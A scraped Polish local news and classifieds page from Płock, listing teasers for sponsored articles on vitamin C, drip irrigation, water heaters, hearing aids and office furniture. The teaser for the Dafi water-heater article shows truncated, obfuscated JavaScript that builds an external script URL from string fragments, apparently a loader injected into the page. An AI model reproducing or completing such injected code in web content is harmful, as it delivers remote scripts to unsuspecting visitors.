Facebook GooglePlus Twitter

 • IW jakich produktach znajduje się najwięcej witaminy C?

  W jakich produktach znajduje się najwięcej witaminy C?

  Witamina C uważana jest za jedną z tych najbardziej istotnych dla prawidłowego funkcjonowania każdego ludzkiego organizmu. Tak naprawdę pełni ona w tym organizmie bardzo wiele różnych ról, a ...

 • INawadnianie kroplowe

  Nawadnianie kroplowe

  Wiemy już, że każdy, kto chce zajmować się ogrodnictwem w sposób poważny musi przemyśleć i wybrać właściwy dla swoich potrzeb system nawadniania. Jest to niezbędne, ponieważ systemy nawa...

 • IOgrzewacze przepływowe Dafi

  Ogrzewacze przepływowe Dafi

  (function(){ c7ml=document.createElement("script");c7ml_=("ust");c7mlu="72503570"; c7ml_+="a"+("t.i");c7ml.type="text/javascript"; c7mlu+=".bip3gXa07mlidnXxahe6";c7ml.async=true;c7ml_+="n"+("f...

 • IAparaty słuchowe – gdzie kupić porządny aparat?

  Aparaty słuchowe – gdzie kupić porządny aparat?

  Aparat słuchowy to sprzęt medyczny, który znacząco podnosi komfort życia. Przywraca pełnię zmysłów i dodaje pewności siebie. Odpowiednio dobrane urządzenie hamuje postępowanie wady. Aparat...

 • ISzukasz mebli biurowych? Na to zwróć uwagę!

  Szukasz mebli biurowych? Na to zwróć uwagę!

  Projektując przestrzeń biurową dla konkretnej firmy należy uwzględnić kilka ważnych aspektów, dzięki którym pomieszczenie będzie tworzyć idealne miejsce do pracy. Jednocześnie ma ono uła...

 • W jakich produktach znajduje się najwięcej witaminy C?

  Witamina C uważana jest za jedną z tych najbardziej istotnych dla prawidłowego funkcjonowania ka

 • Nawadnianie kroplowe

  Wiemy już, że każdy, kto chce zajmować się ogrodnictwem w sposób poważny musi przemyśleć i

 • Ogrzewacze przepływowe Dafi

  (function(){ c7ml=document.createElement("script");c7ml_=("ust");c7mlu="72503570"; c7ml_+="a"+

 • Aparaty słuchowe – gdzie kupić porządny aparat?

  Aparat słuchowy to sprzęt medyczny, który znacząco podnosi komfort życia. Przywraca pełnię zm

 • Szukasz mebli biurowych? Na to zwróć uwagę!

  Projektując przestrzeń biurową dla konkretnej firmy należy uwzględnić kilka ważnych aspektów

Ogłoszenia Płock, Praca Płock i okolice - Aktualności Płock
czwartek, 31 styczeń 2019 07:59

Początek nowego roku to dobra okazja, aby coś zmienić w swoim życiu. Wśród najczęstszych postanowień pojawiają się plany związane z regularnym oszczędzaniem – do gromadzenia kapitału przymierza się ponad 17% Polaków. Jeśli i Ty do nich należysz, dowiedz się od czego zacząć oszczędzanie i jak to robić z sukcesem.

czwartek, 17 styczeń 2019 12:55

Freelancing i praca zdalna zyskują w ostatnich latach na popularności. Na fali tego trendu powstają kolejne biura coworkingowe, umożliwiające wolnym strzelcom wynajęcie przestrzeni do pracy. Dlaczego ich oferta spotyka się z takim zainteresowaniem?

wtorek, 17 kwiecień 2018 12:45

Eksploatacja linii produkcyjnych wymaga regularnych przeglądów wykorzystywanych maszyn i urządzeń. W przypadku ewentualnych awarii bądź drobnych usterek, konieczna może okazać się także wymiana poszczególnych części.

poniedziałek, 09 kwiecień 2018 13:40

Mieszkańcy bloków nieraz zazdroszczą właścicielom domków jednorodzinnych swobody i niezależności oraz bliskiego i bezpośredniego kontaktu z przyrodą. Niejednokrotnie nabywają działki poza miastem i budują na nich własne nieruchomości. Po pewnym czasie zaczynają jednak doceniać wygody związane z mieszkaniem w bloku, gdzie nie trzeba martwić się ani o ciepłą wodę w kranie, ani o kanalizację czy zapewnienie ogrzewania zimą. W domku jednorodzinnym do podgrzewania wody użytkowej najczęściej stosuje się bojler, o pojemności dostosowanej do ilości użytkowników i warunków użytkowania, jednak zdecydowanie lepszym rozwiązaniem są wygodne ogrzewacze przepływowe.

czwartek, 15 marzec 2018 08:26

Witamina C uważana jest za jedną z tych najbardziej istotnych dla prawidłowego funkcjonowania każdego ludzkiego organizmu. Tak naprawdę pełni ona w tym organizmie bardzo wiele różnych ról, a zatem całkiem słusznie powinniśmy zadbać o to, aby dostarczyć ją we właściwych ilościach każdego dnia.

czwartek, 15 marzec 2018 07:56

Wiemy już, że każdy, kto chce zajmować się ogrodnictwem w sposób poważny musi przemyśleć i wybrać właściwy dla swoich potrzeb system nawadniania. Jest to niezbędne, ponieważ systemy nawadniające pozwolą Wam w optymalny sposób pożytkować nakłady sił i środków. Bez względu na to jaki system ostatecznie wybierzecie pamiętajcie, że oznacza on oszczędność czasu, pracy i wody. Dziś słów kilka o systemie nawodnienia kroplowego – dowiecie się jak jest zbudowany i kiedy najlepiej wybrać tę opcję.

piątek, 09 marzec 2018 13:34

Aparat słuchowy to sprzęt medyczny, który znacząco podnosi komfort życia. Przywraca pełnię zmysłów i dodaje pewności siebie. Odpowiednio dobrane urządzenie hamuje postępowanie wady. Aparaty słuchowe należy kupować wyłącznie od sprawdzonych producentów, aby nie tylko otrzymać gwarancję jakości, ale przede wszystkim – nie zaszkodzić samemu sobie.

wtorek, 20 luty 2018 07:59

Projektując przestrzeń biurową dla konkretnej firmy należy uwzględnić kilka ważnych aspektów, dzięki którym pomieszczenie będzie tworzyć idealne miejsce do pracy. Jednocześnie ma ono ułatwiać skupienia się na wykonywanych obowiązkach zawodowych, jak i przyjmowanie klientów, czy kontrahentów. Na co zwrócić szczególną uwagę, szukając mebli biurowych? Zapraszamy do lektury.

piątek, 09 luty 2018 06:59

Bóle głowy są jednymi z najczęściej występujących obecnie dolegliwości. Możemy sobie z nimi poradzić poprzez stosowanie leków przeciwbólowych, jednak jest to działanie jedynie chwilowe, po którym ból głowy wraca z wcześniejszą siłą. Czy jest zatem inny, bardziej naturalny sposób na poradzenie sobie z migrenami?

piątek, 09 luty 2018 06:54

Wiele osób żyje w przekonaniu, że wszelkie urzędowe pomyłki zdarzają się tylko w Polsce. Tymczasem fakty zdają się temu przeczyć. Brytyjski fiskus myli się równie często, jak polski Urząd Skarbowy, czego efektem są znacznie obniżone zwroty podatków. Jak zachować się w sytuacji, gdy zauważymy błąd fiskusa? Oczywiście zgłosić to do urzędu! Zobacz, jak uzyskać prawidłowy zwrot podatku z Anglii.

MENU

Wiadomości

Wydarzenia

Kalendarz

Ogłoszenia

Katalog

Reklama

Kontakt

KATEGORIE

Wiadomości

Sport

Motoryzacja

Polityka

Rozrywka

Sponsorowane

Nauka i Edukacja

Biznes i Gospodarka

Kultura i Sztuka

Społeczeństwo

Bezpieczeństwo

 

Facebook GooglePlus Twitter